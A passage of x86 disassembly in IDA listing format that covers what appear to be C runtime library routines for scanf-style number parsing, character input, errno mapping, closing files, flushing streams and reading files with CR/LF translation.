call sub_42F051
pop ecx
mov ebx, eax
loc_42ED3A: ; CODE XREF: sub_42E5F5+543�j
mov [ebp+var_14], ebx
loc_42ED3D: ; CODE XREF: sub_42E5F5+4FD�j
; sub_42E5F5+52D�j ...
cmp [ebp+var_30], 0
jz loc_42EE56
cmp [ebp+var_F], 0
jnz loc_42EE34
loc_42ED51: ; CODE XREF: sub_42E5F5+82C�j
cmp esi, 78h
jnz short loc_42EDA5
cmp dword_4535C4, 1
jle short loc_42ED6E
push 80h
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42ED7B
; ---------------------------------------------------------------------------
loc_42ED6E: ; CODE XREF: sub_42E5F5+768�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 80h
loc_42ED7B: ; CODE XREF: sub_42E5F5+777�j
test eax, eax
jz loc_42EE26
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_433450
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_42F01A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42EDF8
; ---------------------------------------------------------------------------
loc_42EDA5: ; CODE XREF: sub_42E5F5+75F�j
cmp dword_4535C4, 1
jle short loc_42EDBA
push 4
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42EDC5
; ---------------------------------------------------------------------------
loc_42EDBA: ; CODE XREF: sub_42E5F5+7B7�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 4
loc_42EDC5: ; CODE XREF: sub_42E5F5+7C3�j
test eax, eax
jz short loc_42EE26
cmp esi, 6Fh
jnz short loc_42EDE3
cmp ebx, 38h
jge short loc_42EE26
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_433450
jmp short loc_42EDF2
; ---------------------------------------------------------------------------
loc_42EDE3: ; CODE XREF: sub_42E5F5+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_42C4F0
loc_42EDF2: ; CODE XREF: sub_42E5F5+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_42EDF8: ; CODE XREF: sub_42E5F5+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_42EE10
dec [ebp+var_C]
jz short loc_42EE34
loc_42EE10: ; CODE XREF: sub_42E5F5+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42ED51
; ---------------------------------------------------------------------------
loc_42EE26: ; CODE XREF: sub_42E5F5+788�j
; sub_42E5F5+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42F06B
pop ecx
pop ecx
loc_42EE34: ; CODE XREF: sub_42E5F5+756�j
; sub_42E5F5+819�j
cmp [ebp+var_17], 0
jz loc_42EF1A
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_42EF1A
; ---------------------------------------------------------------------------
loc_42EE56: ; CODE XREF: sub_42E5F5+74C�j
cmp [ebp+var_F], 0
jnz loc_42EF12
loc_42EE60: ; CODE XREF: sub_42E5F5+90A�j
cmp esi, 78h
jz short loc_42EEA4
cmp esi, 70h
jz short loc_42EEA4
cmp dword_4535C4, 1
jle short loc_42EE7F
push 4
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42EE8A
; ---------------------------------------------------------------------------
loc_42EE7F: ; CODE XREF: sub_42E5F5+87C�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 4
loc_42EE8A: ; CODE XREF: sub_42E5F5+888�j
test eax, eax
jz short loc_42EF04
cmp esi, 6Fh
jnz short loc_42EE9D
cmp ebx, 38h
jge short loc_42EF04
shl edi, 3
jmp short loc_42EEDC
; ---------------------------------------------------------------------------
loc_42EE9D: ; CODE XREF: sub_42E5F5+89C�j
lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_42EEDC
; ---------------------------------------------------------------------------
loc_42EEA4: ; CODE XREF: sub_42E5F5+86E�j
; sub_42E5F5+873�j
cmp dword_4535C4, 1
jle short loc_42EEBC
push 80h
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42EEC9
; ---------------------------------------------------------------------------
loc_42EEBC: ; CODE XREF: sub_42E5F5+8B6�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 80h
loc_42EEC9: ; CODE XREF: sub_42E5F5+8C5�j
test eax, eax
jz short loc_42EF04
push ebx
shl edi, 4
call sub_42F01A
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42EEDC: ; CODE XREF: sub_42E5F5+8A6�j
; sub_42E5F5+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_42EEEE
dec [ebp+var_C]
jz short loc_42EF12
loc_42EEEE: ; CODE XREF: sub_42E5F5+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42EE60
; ---------------------------------------------------------------------------
loc_42EF04: ; CODE XREF: sub_42E5F5+897�j
; sub_42E5F5+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42F06B
pop ecx
pop ecx
loc_42EF12: ; CODE XREF: sub_42E5F5+865�j
; sub_42E5F5+8F7�j
cmp [ebp+var_17], 0
jz short loc_42EF1A
neg edi
loc_42EF1A: ; CODE XREF: sub_42E5F5+843�j
; sub_42E5F5+85C�j ...
cmp esi, 46h
jnz short loc_42EF23
and [ebp+var_1C], 0
loc_42EF23: ; CODE XREF: sub_42E5F5+928�j
cmp [ebp+var_1C], 0
jz loc_42EFFB
cmp [ebp+var_E], 0
jnz short loc_42EF5C
inc [ebp+var_34]
loc_42EF36: ; CODE XREF: sub_42E5F5+23B�j
cmp [ebp+var_30], 0
jz short loc_42EF4C
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_42EF5C
; ---------------------------------------------------------------------------
loc_42EF4C: ; CODE XREF: sub_42E5F5+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_42EF59
mov [eax], edi
jmp short loc_42EF5C
; ---------------------------------------------------------------------------
loc_42EF59: ; CODE XREF: sub_42E5F5+95E�j
mov [eax], di
loc_42EF5C: ; CODE XREF: sub_42E5F5+241�j
; sub_42E5F5+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_42EFA9
; ---------------------------------------------------------------------------
loc_42EF67: ; CODE XREF: sub_42E5F5+93�j
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_42EFD6
mov ecx, off_4533B8
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42EFA9
inc [ebp+var_4]
push edi
call sub_42F051
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_42EFE4
dec [ebp+var_4]
loc_42EFA9: ; CODE XREF: sub_42E5F5+970�j
; sub_42E5F5+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_42EFBF
cmp byte ptr [esi], 25h
jnz short loc_42F001
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_42F001
mov esi, eax
loc_42EFBF: ; CODE XREF: sub_42E5F5+9B8�j
mov al, [esi]
test al, al
jnz loc_42E61F
jmp short loc_42EFFB
; ---------------------------------------------------------------------------
loc_42EFCB: ; CODE XREF: sub_42E5F5+1F4�j
; sub_42E5F5+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_42EFDB
; ---------------------------------------------------------------------------
loc_42EFD6: ; CODE XREF: sub_42E5F5+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_42EFDB: ; CODE XREF: sub_42E5F5+9DF�j
call sub_42F06B
pop ecx
pop ecx
jmp short loc_42EFFB
; ---------------------------------------------------------------------------
loc_42EFE4: ; CODE XREF: sub_42E5F5+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_42F06B
dec [ebp+var_4]
push edi
push ebx
call sub_42F06B
add esp, 10h
loc_42EFFB: ; CODE XREF: sub_42E5F5+1F�j
; sub_42E5F5+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_42F012
loc_42F001: ; CODE XREF: sub_42E5F5+9BD�j
; sub_42E5F5+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_42F015
cmp [ebp+var_15], al
jnz short loc_42F015
or eax, 0FFFFFFFFh
jmp short loc_42F015
; ---------------------------------------------------------------------------
loc_42F012: ; CODE XREF: sub_42E5F5+A0A�j
mov eax, [ebp+var_34]
loc_42F015: ; CODE XREF: sub_42E5F5+A11�j
; sub_42E5F5+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42E5F5 endp
; =============== S U B R O U T I N E =======================================
sub_42F01A proc near ; CODE XREF: sub_42E5F5+7A3�p
; sub_42E5F5+8DC�p
arg_0 = dword ptr 4
cmp dword_4535C4, 1
push esi
jle short loc_42F034
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42F043
; ---------------------------------------------------------------------------
loc_42F034: ; CODE XREF: sub_42F01A+8�j
mov esi, [esp+4+arg_0]
mov eax, off_4533B8
mov al, [eax+esi*2]
and eax, 4
loc_42F043: ; CODE XREF: sub_42F01A+18�j
test eax, eax
jnz short loc_42F04D
and esi, 0FFFFFFDFh
sub esi, 7
loc_42F04D: ; CODE XREF: sub_42F01A+2B�j
mov eax, esi
pop esi
retn
sub_42F01A endp
; =============== S U B R O U T I N E =======================================
sub_42F051 proc near ; CODE XREF: sub_42E5F5+1E1�p
; sub_42E5F5+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_42F063
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_42F063: ; CODE XREF: sub_42F051+7�j
push edx
call sub_42F3E2
pop ecx
retn
sub_42F051 endp
; =============== S U B R O U T I N E =======================================
sub_42F06B proc near ; CODE XREF: sub_42E5F5+6B�p
; sub_42E5F5+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_42F081
push [esp+arg_4]
push [esp+4+arg_0]
call sub_43346F
pop ecx
pop ecx
locret_42F081: ; CODE XREF: sub_42F06B+5�j
retn
sub_42F06B endp
; =============== S U B R O U T I N E =======================================
sub_42F082 proc near ; CODE XREF: sub_42E5F5+63�p
; sub_42E5F5+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_42F088: ; CODE XREF: sub_42F082+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_42F051
mov edi, eax
push edi
call sub_42C54C
pop ecx
test eax, eax
pop ecx
jnz short loc_42F088
mov eax, edi
pop edi
pop esi
retn
sub_42F082 endp
; =============== S U B R O U T I N E =======================================
sub_42F0A6 proc near ; CODE XREF: sub_42A6C0+16�p
; sub_42AB81+67�p ...
arg_0 = dword ptr 4
push esi
call sub_42F122
mov ecx, [esp+4+arg_0]
xor esi, esi
mov [eax], ecx
mov eax, offset dword_453250
loc_42F0B9: ; CODE XREF: sub_42F0A6+20�j
cmp ecx, [eax]
jz short loc_42F0DF
add eax, 8
inc esi
cmp eax, offset off_4533B8
jl short loc_42F0B9
cmp ecx, 13h
jb short loc_42F0EF
cmp ecx, 24h
ja short loc_42F0EF
call sub_42F119
mov dword ptr [eax], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F0DF: ; CODE XREF: sub_42F0A6+15�j
call sub_42F119
mov ecx, dword_453254[esi*8]
pop esi
mov [eax], ecx
retn
; ---------------------------------------------------------------------------
loc_42F0EF: ; CODE XREF: sub_42F0A6+25�j
; sub_42F0A6+2A�j
cmp ecx, 0BCh
jb short loc_42F10C
cmp ecx, 0CAh
ja short loc_42F10C
call sub_42F119
mov dword ptr [eax], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F10C: ; CODE XREF: sub_42F0A6+4F�j
; sub_42F0A6+57�j
call sub_42F119
mov dword ptr [eax], 16h
pop esi
retn
sub_42F0A6 endp
; =============== S U B R O U T I N E =======================================
sub_42F119 proc near ; CODE XREF: sub_429E59:loc_42A00B�p
; sub_42A2C1+83�p ...
call sub_42E4EE
add eax, 8
retn
sub_42F119 endp
; =============== S U B R O U T I N E =======================================
sub_42F122 proc near ; CODE XREF: sub_42A6C0+36�p
; sub_42F0A6+1�p ...
call sub_42E4EE
add eax, 0Ch
retn
sub_42F122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F12B proc near ; CODE XREF: sub_429E59+27�p
; sub_429E59+E4�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_42F149
mov ecx, off_4533B8
movzx eax, word ptr [ecx+eax*2]
jmp short loc_42F19B
; ---------------------------------------------------------------------------
loc_42F149: ; CODE XREF: sub_42F12B+10�j
mov ecx, eax
push esi
mov esi, off_4533B8
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_42F16E
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_42F177
; ---------------------------------------------------------------------------
loc_42F16E: ; CODE XREF: sub_42F12B+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_42F177: ; CODE XREF: sub_42F12B+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4334DD
add esp, 1Ch
test eax, eax
jnz short loc_42F197
leave
retn
; ---------------------------------------------------------------------------
loc_42F197: ; CODE XREF: sub_42F12B+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_42F19B: ; CODE XREF: sub_42F12B+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_42F12B endp
; =============== S U B R O U T I N E =======================================
sub_42F1A0 proc near ; CODE XREF: sub_418A3A+88�p
; sub_418AD3+216�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FE0
jnb short loc_42F1E5
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F1E5
push edi
push esi
call sub_43241B
push esi
call sub_42F1FD
push esi
mov edi, eax
call sub_43247A
add esp, 0Ch
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F1E5: ; CODE XREF: sub_42F1A0+B�j
; sub_42F1A0+26�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F1A0 endp
; =============== S U B R O U T I N E =======================================
sub_42F1FD proc near ; CODE XREF: sub_42F1A0+30�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_4323D9
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42F24B
cmp esi, 1
jz short loc_42F219
cmp esi, 2
jnz short loc_42F22F
loc_42F219: ; CODE XREF: sub_42F1FD+15�j
push 2
call sub_4323D9
push 1
mov edi, eax
call sub_4323D9
pop ecx
cmp eax, edi
pop ecx
jz short loc_42F24B
loc_42F22F: ; CODE XREF: sub_42F1FD+1A�j
push esi
call sub_4323D9
pop ecx
push eax
call dword_437044 ; CloseHandle
test eax, eax
jnz short loc_42F24B
call dword_437170 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_42F24D
; ---------------------------------------------------------------------------
loc_42F24B: ; CODE XREF: sub_42F1FD+10�j
; sub_42F1FD+30�j ...
xor edi, edi
loc_42F24D: ; CODE XREF: sub_42F1FD+4C�j
push esi
call sub_43235A
mov eax, esi
and esi, 1Fh
sar eax, 5
pop ecx
mov eax, dword_676EE0[eax*4]
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_42F27B
push edi
call sub_42F0A6
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_42F27D
; ---------------------------------------------------------------------------
loc_42F27B: ; CODE XREF: sub_42F1FD+70�j
xor eax, eax
loc_42F27D: ; CODE XREF: sub_42F1FD+7C�j
pop edi
pop esi
retn
sub_42F1FD endp
; =============== S U B R O U T I N E =======================================
sub_42F280 proc near ; CODE XREF: sub_42A13C+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_42F2A9
test al, 8
jz short loc_42F2A9
push dword ptr [esi+8]
call sub_4298F2
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_42F2A9: ; CODE XREF: sub_42F280+A�j
; sub_42F280+E�j
pop esi
retn
sub_42F280 endp
; =============== S U B R O U T I N E =======================================
sub_42F2AB proc near ; CODE XREF: sub_42F33E+4C�p
; sub_42F33E+67�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_42F2D9
test eax, eax
pop ecx
jz short loc_42F2C0
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F2C0: ; CODE XREF: sub_42F2AB+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_42F2D5
push dword ptr [esi+10h]
call sub_433626
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_42F2D5: ; CODE XREF: sub_42F2AB+19�j
xor eax, eax
pop esi
retn
sub_42F2AB endp
; =============== S U B R O U T I N E =======================================
sub_42F2D9 proc near ; CODE XREF: sub_42A13C+10�p
; sub_42A44E+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_42F326
test ax, 108h
jz short loc_42F326
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_42F326
push edi
push eax
push dword ptr [esi+10h]
call sub_43249C
add esp, 0Ch
cmp eax, edi
jnz short loc_42F31F
mov eax, [esi+0Ch]
test al, 80h
jz short loc_42F326
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_42F326
; ---------------------------------------------------------------------------
loc_42F31F: ; CODE XREF: sub_42F2D9+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_42F326: ; CODE XREF: sub_42F2D9+14�j
; sub_42F2D9+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_42F2D9 endp
; =============== S U B R O U T I N E =======================================
sub_42F335 proc near ; CODE XREF: sub_42C1C0�p
push 1
call sub_42F33E
pop ecx
retn
sub_42F335 endp
; =============== S U B R O U T I N E =======================================
sub_42F33E proc near ; CODE XREF: sub_42F335+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_42DAEF
xor esi, esi
pop ecx
cmp dword_678020, esi
jle short loc_42F3CB
loc_42F357: ; CODE XREF: sub_42F33E+8B�j
mov eax, dword_67700C
mov eax, [eax+esi*4]
test eax, eax
jz short loc_42F3C2
test byte ptr [eax+0Ch], 83h
jz short loc_42F3C2
push eax
push esi
call sub_42C203
mov eax, dword_67700C
pop ecx
pop ecx
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_42F3B2
cmp [esp+0Ch+arg_0], 1
jnz short loc_42F398
push eax
call sub_42F2AB
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42F3B2
inc ebx
jmp short loc_42F3B2
; ---------------------------------------------------------------------------
loc_42F398: ; CODE XREF: sub_42F33E+49�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_42F3B2
test cl, 2
jz short loc_42F3B2
push eax
call sub_42F2AB
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_42F3B2
or edi, eax
loc_42F3B2: ; CODE XREF: sub_42F33E+42�j
; sub_42F33E+55�j ...
mov eax, dword_67700C
push dword ptr [eax+esi*4]
push esi
call sub_42C255
pop ecx
pop ecx
loc_42F3C2: ; CODE XREF: sub_42F33E+23�j
; sub_42F33E+29�j
inc esi
cmp esi, dword_678020
jl short loc_42F357
loc_42F3CB: ; CODE XREF: sub_42F33E+17�j
push 2
call sub_42DB50
cmp [esp+10h+arg_0], 1
pop ecx
mov eax, ebx
jz short loc_42F3DE
mov eax, edi
loc_42F3DE: ; CODE XREF: sub_42F33E+9C�j
pop edi
pop esi
pop ebx
retn
sub_42F33E endp
; =============== S U B R O U T I N E =======================================
sub_42F3E2 proc near ; CODE XREF: sub_42A1B7+A9�p
; sub_42B087+34�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_42F4B9
test al, 40h
jnz loc_42F4B9
test al, 2
jz short loc_42F408
or al, 20h
mov [esi+0Ch], eax
jmp loc_42F4B9
; ---------------------------------------------------------------------------
loc_42F408: ; CODE XREF: sub_42F3E2+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_42F41C
push esi
call sub_4331F3
pop ecx
jmp short loc_42F421
; ---------------------------------------------------------------------------
loc_42F41C: ; CODE XREF: sub_42F3E2+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_42F421: ; CODE XREF: sub_42F3E2+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_42F4BE
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_42F4A8
cmp eax, 0FFFFFFFFh
jz short loc_42F4A8
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_42F47D
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_42F466
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_676EE0[edi*4]
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_42F46B
; ---------------------------------------------------------------------------
loc_42F466: ; CODE XREF: sub_42F3E2+6B�j
mov edi, offset dword_4535D0
loc_42F46B: ; CODE XREF: sub_42F3E2+82�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_42F47D
or dh, 20h
mov [esi+0Ch], edx
loc_42F47D: ; CODE XREF: sub_42F3E2+62�j
; sub_42F3E2+93�j
cmp dword ptr [esi+18h], 200h
jnz short loc_42F49A
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_42F49A
test ch, 4
jnz short loc_42F49A
mov dword ptr [esi+18h], 1000h
loc_42F49A: ; CODE XREF: sub_42F3E2+A2�j
; sub_42F3E2+AA�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F4A8: ; CODE XREF: sub_42F3E2+55�j
; sub_42F3E2+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_42F4B9: ; CODE XREF: sub_42F3E2+A�j
; sub_42F3E2+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F3E2 endp
; =============== S U B R O U T I N E =======================================
sub_42F4BE proc near ; CODE XREF: sub_41EC9D+EC�p
; sub_42A1B7+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FE0
jnb short loc_42F50B
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F50B
push edi
push esi
call sub_43241B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_42F523
push esi
mov edi, eax
call sub_43247A
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F50B: ; CODE XREF: sub_42F4BE+B�j
; sub_42F4BE+26�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F4BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F523 proc near ; CODE XREF: sub_42F4BE+38�p
; sub_4336B9+274�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_42F6F5
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
mov eax, dword_676EE0[ecx*4]
lea edi, ds:676EE0h[ecx*4]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_42F6F5
test cl, 48h
jz short loc_42F58E
mov al, [eax+5]
cmp al, 0Ah
jz short loc_42F58E
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_42F58E: ; CODE XREF: sub_42F523+4C�j
; sub_42F523+53�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [edi]
push [ebp+arg_8]
push edx
push dword ptr [eax+esi]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_42F5E0
call dword_437170 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_42F5C8
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
mov [eax], esi
jmp short loc_42F5D8
; ---------------------------------------------------------------------------
loc_42F5C8: ; CODE XREF: sub_42F523+8F�j
cmp eax, 6Dh
jz loc_42F6F5
push eax
call sub_42F0A6
pop ecx
loc_42F5D8: ; CODE XREF: sub_42F523+A3�j
or eax, 0FFFFFFFFh
jmp loc_42F6F7
; ---------------------------------------------------------------------------
loc_42F5E0: ; CODE XREF: sub_42F523+82�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_42F6F0
test edx, edx
jz short loc_42F605
cmp byte ptr [ebx], 0Ah
jnz short loc_42F605
or al, 4
jmp short loc_42F607
; ---------------------------------------------------------------------------
loc_42F605: ; CODE XREF: sub_42F523+D7�j
; sub_42F523+DC�j
and al, 0FBh
loc_42F607: ; CODE XREF: sub_42F523+E0�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_42F6EA
loc_42F61F: ; CODE XREF: sub_42F523+1AF�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_42F6DA
cmp al, 0Dh
jz short loc_42F63B
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_42F6CC
; ---------------------------------------------------------------------------
loc_42F63B: ; CODE XREF: sub_42F523+10B�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_42F659
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_42F650
add [ebp+arg_8], 2
jmp short loc_42F6AE
; ---------------------------------------------------------------------------
loc_42F650: ; CODE XREF: sub_42F523+125�j
mov byte ptr [ebx], 0Dh
inc ebx
mov [ebp+arg_8], eax
jmp short loc_42F6CC
; ---------------------------------------------------------------------------
loc_42F659: ; CODE XREF: sub_42F523+11C�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_42F681
call dword_437170 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_42F6C8
loc_42F681: ; CODE XREF: sub_42F523+152�j
cmp [ebp+var_C], 0
jz short loc_42F6C8
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_42F6A3
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_42F6AE
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
inc ebx
mov [ecx+esi+5], al
jmp short loc_42F6CC
; ---------------------------------------------------------------------------
loc_42F6A3: ; CODE XREF: sub_42F523+16B�j
cmp ebx, [ebp+arg_4]
jnz short loc_42F6B3
cmp [ebp+var_1], 0Ah
jnz short loc_42F6B3
